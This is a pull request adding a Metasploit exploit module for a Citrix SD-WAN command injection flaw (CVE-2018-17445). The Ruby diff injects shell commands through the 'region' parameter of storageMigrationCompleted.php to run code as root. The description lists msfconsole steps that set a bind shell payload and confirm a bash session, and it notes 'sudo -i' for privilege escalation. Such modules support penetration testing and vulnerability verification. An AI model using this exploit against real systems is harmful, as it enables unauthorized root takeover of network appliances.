### PR TITLE
Add Citrix SD-WAN Command Injection module

### DIFF
--- a/modules/exploits/unix/webapp/citrix_sdwan_command_injection.rb
+++ b/modules/exploits/unix/webapp/citrix_sdwan_command_injection.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => "Citrix SD-WAN Command Injection",
+      'Description' => %q{
+        This module exploits an arbitrary command execution vulnerability in
+        Citrix SD-WAN 10.1.0 and NetScaler SD-WAN 9.3.x before 9.3.6 and 10.0.x before 10.0.4.
+        This vulnerability can allow an attacker execute arbitrary command with root privileges.
+        An attacker gained access to the operating system can escalate his privileges to the root's
+        privileges using "sudo -i" command.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Nikita Oleksov <neoleksov[at]gmail.com>' ],
+      'References' =>
+        [
+          ['CVE', '2018-17445'],
+          ['BID', '105711'],
+          ['URL', 'https://support.citrix.com/article/CTX236992']
+        ],
+      'Privileged' => false,
+      'Targets' =>
+        [
+          [ 'CMD',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix'
+            }
+          ]
+        ],
+      'Payload' => {
+        'BadChars' => "\x27",
+          'Compat' => {
+            'PayloadType' => 'cmd'
+          }
+      },
+      'DefaultOptions' => {
+        'SSL' => true
+      },
+      'DisclosureDate' => '2018-10-23',
+      'DefaultTarget' => 0)
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('TARGETURI', [true, 'Path to WebService', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'storageMigrationCompleted.php'),
+      'vars_get' => {
+        'region' => ';id;'
+      }
+    )
+
+    unless res
+      vprint_bad("Could not connect to the web service")
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200 && res.body =~ /uid=/
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path, 'storageMigrationCompleted.php'),
+      'vars_get' => {
+        'region' => ";#{payload.encoded};"
+      }
+    )
+    unless res
+      vprint_bad("Could not connect to the web service")
+    end
+  end
+end


### PR DESCRIPTION
This module exploits an arbitrary command execution vulnerability in Citrix SD-WAN.
This vulnerability can allow an attacker execute arbitrary command with root privileges.
An attacker gained access to the operating system can escalate his privileges to the root's privileges using "sudo -i" command.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use unix/webapp/citrix_command_injection`
- [ ]  `set payload cmd/unix/bind_awk`
- [ ]  `set RHOSTS <r_host>`
- [ ]  `set RPORT <r_port>`
- [ ]  `set SSL <true/false>`
- [ ]  `set LHOST <l_host>`
- [ ]  `set LPORT <l_port>`
- [ ]  `check`
- [ ] **Verify** that the host is vulnerable.
- [ ]  `run`
- [ ] **Verify** that the module open socket with bash session on `l_host:l_port`.
